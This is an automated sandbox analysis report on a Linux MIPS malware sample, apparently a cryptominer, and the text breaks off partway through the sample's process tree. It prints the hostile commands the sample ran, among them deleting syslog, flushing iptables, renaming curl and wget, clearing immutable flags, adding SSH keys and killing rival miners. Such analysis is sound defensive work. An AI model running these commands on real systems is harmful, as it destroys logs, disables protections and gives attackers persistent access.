3c7faf7512565d86b1ec4fe2810b2006b75c3476b4a5b955f0141d9a1c237d38

Analysis

max time kernel
150s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
09-09-2024 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d66aca73387d8ab787f71544777285b5_JaffaCakes118
Size

36KB
MD5

d66aca73387d8ab787f71544777285b5
SHA1

526715af85f935e34b15f124d4b57c8fc37fc1a5
SHA256

3c7faf7512565d86b1ec4fe2810b2006b75c3476b4a5b955f0141d9a1c237d38
SHA512

c9ab083fa7d6a49c333020c13e241303da28afe5a8bd2cf60733fc419ecabef91a9360ac70b5425ee85109367554f3d2a9bf1434dd918ab514fe6ac8800de5ed
SSDEEP

384:x7DQQwQHDf6jlpTWg3vMQ4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeUoJpJyd5:x7kFNc48FkcOYq0xvQGd51ZdAAPPD

Score

8^/10

discovery execution persistence privilege_escalatio privilege_escalation

Malware Config

Signatures

Adds new SSH keys 1 TTPs 1 IoCs

Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

persistence privilege_escalation

SSH Authorized Keys

T1098.004

description	ioc	Process
File opened for modification	/root/.ssh/authorized_keys	d66aca73387d8ab787f71544777285b5_JaffaCakes118

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
739	iptables

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
922	xargs
1237	xargs
1632	xargs
1708	xargs
1718	xargs
866	xargs
1608	xargs
1724	xargs
752	grep
800	xargs
1361	xargs
1549	xargs
1169	xargs
1305	xargs
1402	xargs
1644	xargs
2088	Process not Found
736	chattr
1262	xargs
1335	xargs
1341	xargs
1636	xargs
1734	xargs
947	xargs
1197	xargs
1316	xargs
1652	xargs
1714	xargs
1192	xargs
1509	xargs
1668	xargs
2035	Process not Found
2241	Process not Found
1288	xargs
1311	xargs
1485	xargs
1604	xargs
2015	Process not Found
2023	Process not Found
776	xargs
1409	xargs
1732	xargs
836	xargs
1048	xargs
1155	xargs
1328	xargs
1373	xargs
1688	xargs
1134	xargs
1242	xargs
1662	xargs
1706	xargs
2252	Process not Found
1670	xargs
881	xargs
992	xargs
1202	xargs
1630	xargs
1720	xargs
2238	Process not Found
912	xargs
1387	xargs
764	xargs
1497	xargs

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.EBQZPV	Process not Found

Disables AppArmor 16 IoCs

Disables AppArmor security module.

pid	Process
2068	Process not Found
2075	Process not Found
2076	Process not Found
2068	Process not Found
2079	Process not Found
2076	Process not Found
2083	Process not Found
2076	Process not Found
2068	Process not Found
2068	Process not Found
2068	Process not Found
2068	Process not Found
2081	Process not Found
2076	Process not Found
2076	Process not Found
2076	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	Process not Found
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/8/status	pkill
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/674/status	pgrep
File opened for reading	/proc/716/status	ps
File opened for reading	/proc/708/status	pkill
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/23/stat	ps
File opened for reading	/proc/675/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/11/status	pkill
File opened for reading	/proc/707/cmdline	ps
File opened for reading	/proc/716/stat	ps
File opened for reading	/proc/75/status	ps
File opened for reading	/proc/77/cmdline	pgrep
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/708/status	pkill
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/37/cmdline	ps
File opened for reading	/proc/380/cmdline	ps
File opened for reading	/proc/354/stat	ps
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/380/status	pgrep
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/81/cmdline	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/674/cmdline	ps
File opened for reading	/proc/70/cmdline	ps
File opened for reading	/proc/76/status	pkill
File opened for reading	/proc/175/status	pkill
File opened for reading	/proc/71/status	pkill
File opened for reading	/proc/655/status	pkill
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/710/status	pgrep
File opened for reading	/proc/422/status	ps
File opened for reading	/proc/78/cmdline	pkill
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/1435/stat	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/359/stat	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/10/cmdline	ps
File opened for reading	/proc/78/cmdline	ps
File opened for reading	/proc/381/stat	ps
File opened for reading	/proc/159/cmdline	pgrep
File opened for reading	/proc/380/status	pkill
File opened for reading	/proc/70/status	pkill
File opened for reading	/proc/655/stat	ps
File opened for reading	/proc/380/cmdline	pgrep
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/82/cmdline	pgrep
File opened for reading	/proc/359/status	pkill
File opened for reading	/proc/330/cmdline	pkill
File opened for reading	/proc/154/cmdline	ps
File opened for reading	/proc/381/stat	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/3/cmdline	pgrep
File opened for reading	/proc/381/status	pgrep
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/1044/stat	ps
File opened for reading	/proc/9/status	ps

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/dev/null	d66aca73387d8ab787f71544777285b5_JaffaCakes118
File opened for modification	/tmp/kdevtmpfsi	d66aca73387d8ab787f71544777285b5_JaffaCakes118
File opened for modification	/tmp/redis2	d66aca73387d8ab787f71544777285b5_JaffaCakes118

/tmp/d66aca73387d8ab787f71544777285b5_JaffaCakes118
/tmp/d66aca73387d8ab787f71544777285b5_JaffaCakes118
1⤵
- Adds new SSH keys
- Writes file to tmp directory
PID:710
- /bin/sync
  sync
  2⤵
  PID:712
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:714
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:717
- /bin/mv
  mv /usr/bin/curl /usr/bin/url
  2⤵
  PID:722
- /bin/mv
  mv /usr/bin/url /usr/bin/cdl
  2⤵
  PID:725
- /bin/mv
  mv /usr/bin/wget /usr/bin/get
  2⤵
  PID:727
- /bin/mv
  mv /usr/bin/get /usr/bin/wdl
  2⤵
  PID:729
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:732
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  PID:734
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:736
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:739
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:743
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:746
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:747
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:748
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:750
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:752
- /bin/ps
  ps aux
  2⤵
  PID:751
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  PID:756
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:755
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:758
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  PID:759
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:761
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:762
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:770
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:769
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:768
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:767
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:776
- /bin/grep
  grep -v -
  2⤵
  PID:775
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:774
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:773
- /bin/grep
  grep :443
  2⤵
  PID:772
- /bin/grep
  grep -v -
  2⤵
  PID:781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:782
- /bin/grep
  grep :23
  2⤵
  PID:778
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:780
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:779
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:788
- /bin/grep
  grep -v -
  2⤵
  PID:787
- /bin/grep
  grep :443
  2⤵
  PID:784
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:786
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:785
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:794
- /bin/grep
  grep -v -
  2⤵
  PID:793
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:791
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:792
- /bin/grep
  grep :143
  2⤵
  PID:790
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:800
- /bin/grep
  grep -v -
  2⤵
  PID:799
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:798
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:797
- /bin/grep
  grep :2222
  2⤵
  PID:796
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:806
- /bin/grep
  grep -v -
  2⤵
  PID:805
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:804
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:803
- /bin/grep
  grep :3333
  2⤵
  PID:802
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:812
- /bin/grep
  grep -v -
  2⤵
  PID:811
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:810
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:809
- /bin/grep
  grep :3389
  2⤵
  PID:808
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:818
- /bin/grep
  grep -v -
  2⤵
  PID:817
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:816
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:815
- /bin/grep
  grep :4444
  2⤵
  PID:814
- /bin/grep
  grep -v -
  2⤵
  PID:823
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:822
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:821
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:824
- /bin/grep
  grep :5555
  2⤵
  PID:820
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:830
- /bin/grep
  grep -v -
  2⤵
  PID:829
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:828
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:827
- /bin/grep
  grep :6666
  2⤵
  PID:826
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:836
- /bin/grep
  grep -v -
  2⤵
  PID:835
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:834
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:833
- /bin/grep
  grep :6665
  2⤵
  PID:832
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:842
- /bin/grep
  grep -v -
  2⤵
  PID:841
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:840
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:839
- /bin/grep
  grep :6667
  2⤵
  PID:838
- /bin/grep
  grep -v -
  2⤵
  PID:847
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:846
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:845
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:848
- /bin/grep
  grep :7777
  2⤵
  PID:844
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:854
- /bin/grep
  grep -v -
  2⤵
  PID:853
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:852
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:851
- /bin/grep
  grep :8444
  2⤵
  PID:850
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:860
- /bin/grep
  grep -v -
  2⤵
  PID:859
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:858
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:857
- /bin/grep
  grep :3347
  2⤵
  PID:856
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:866
- /bin/grep
  grep -v -
  2⤵
  PID:865
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:864
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:863
- /bin/grep
  grep :14433
  2⤵
  PID:862
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:871
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:870
- /bin/grep
  grep :3333
  2⤵
  PID:869
- /bin/grep
  grep -v grep
  2⤵
  PID:868
- /bin/ps
  ps aux
  2⤵
  PID:867
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:876
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:875
- /bin/grep
  grep :5555
  2⤵
  PID:874
- /bin/grep
  grep -v grep
  2⤵
  PID:873
- /bin/ps
  ps aux
  2⤵
  PID:872
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:881
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:880
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:879
- /bin/grep
  grep -v grep
  2⤵
  PID:878
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:877
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:886
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:885
- /bin/grep
  grep log_
  2⤵
  PID:884
- /bin/grep
  grep -v grep
  2⤵
  PID:883
- /bin/ps
  ps aux
  2⤵
  PID:882
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:891
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:890
- /bin/grep
  grep systemten
  2⤵
  PID:889
- /bin/grep
  grep -v grep
  2⤵
  PID:888
- /bin/ps
  ps aux
  2⤵
  PID:887
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:896
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    PID:897
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    PID:897
- - /usr/sbin/kill
    kill -9 10
    3⤵
    PID:897
- - /usr/bin/kill
    kill -9 10
    3⤵
    PID:897
- - /sbin/kill
    kill -9 10
    3⤵
    PID:897
- - /bin/kill
    kill -9 10
    3⤵
    - Reads CPU attributes
    PID:897
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:895
- /bin/grep
  grep netns
  2⤵
  PID:894
- /bin/grep
  grep -v grep
  2⤵
  PID:893
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:892
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:902
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:901
- /bin/grep
  grep voltuned
  2⤵
  PID:900
- /bin/grep
  grep -v grep
  2⤵
  PID:899
- /bin/ps
  ps aux
  2⤵
  PID:898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:907
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:906
- /bin/grep
  grep darwin
  2⤵
  PID:905
- /bin/grep
  grep -v grep
  2⤵
  PID:904
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:912
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:911
- /bin/grep
  grep -v grep
  2⤵
  PID:909
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:910
- /bin/ps
  ps aux
  2⤵
  PID:908
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:917
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:916
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:915
- /bin/grep
  grep -v grep
  2⤵
  PID:914
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:913
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:922
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:921
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:920
- /bin/grep
  grep -v grep
  2⤵
  PID:919
- /bin/ps
  ps aux
  2⤵
  PID:918
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:927
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:926
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:925
- /bin/grep
  grep -v grep
  2⤵
  PID:924
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:932
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:931
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:930
- /bin/grep
  grep -v grep
  2⤵
  PID:929
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:928
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:937
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:936
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:935
- /bin/grep
  grep -v grep
  2⤵
  PID:934
- /bin/ps
  ps aux
  2⤵
  PID:933
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:942
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:941
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:940
- /bin/grep
  grep -v grep
  2⤵
  PID:939
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:938
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:947
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:946
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:945
- /bin/grep
  grep -v grep
  2⤵
  PID:944
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:943
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:952
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:951
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:950
- /bin/grep
  grep -v grep
  2⤵
  PID:949
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:948
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:957
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:956
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:955
- /bin/grep
  grep -v grep
  2⤵
  PID:954
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:953
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:962
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:961
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:960
- /bin/grep
  grep -v grep
  2⤵
  PID:959
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:958
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:967
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:966
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:965
- /bin/grep
  grep -v grep
  2⤵
  PID:964
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:963
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:972
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:971
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:970
- /bin/grep
  grep -v grep
  2⤵
  PID:969
- /bin/ps
  ps aux
  2⤵
  PID:968
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:977
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:976
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:975
- /bin/grep
  grep -v grep
  2⤵
  PID:974
- /bin/ps
  ps aux
  2⤵
  PID:973
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:982
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:981
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:980
- /bin/grep
  grep -v grep
  2⤵
  PID:979
- /bin/ps
  ps aux
  2⤵
  PID:978
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:987
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:986
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:985
- /bin/grep
  grep -v grep
  2⤵
  PID:984
- /bin/ps
  ps aux
  2⤵
  PID:983
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:992
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:991
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:990
- /bin/grep
  grep -v grep
  2⤵
  PID:989
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:988
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:999
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:998
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:997
- /bin/grep
  grep -v grep
  2⤵
  PID:996
- /bin/ps
  ps aux
  2⤵
  PID:995
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1004
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1003
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1002
- /bin/grep
  grep -v grep
  2⤵
  PID:1001
- /bin/ps
  ps aux
  2⤵
  PID:1000
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1014
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1013
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1012
- /bin/grep
  grep -v grep
  2⤵
  PID:1011
- /bin/ps
  ps aux
  2⤵
  PID:1010
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1021
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1020
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1019
- /bin/grep
  grep -v grep
  2⤵
  PID:1018
- /bin/ps
  ps aux
  2⤵
  PID:1017
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1028
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1027
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1026
- /bin/grep
  grep -v grep
  2⤵
  PID:1025
- /bin/ps
  ps aux
  2⤵
  PID:1024
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1033
- /bin/grep
  grep -v grep
  2⤵
  PID:1032
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1034
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1035
- /bin/ps
  ps aux
  2⤵
  PID:1031
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1042
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1041
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1040
- /bin/grep
  grep -v grep
  2⤵
  PID:1039
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1038
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1047
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1046
- /bin/grep
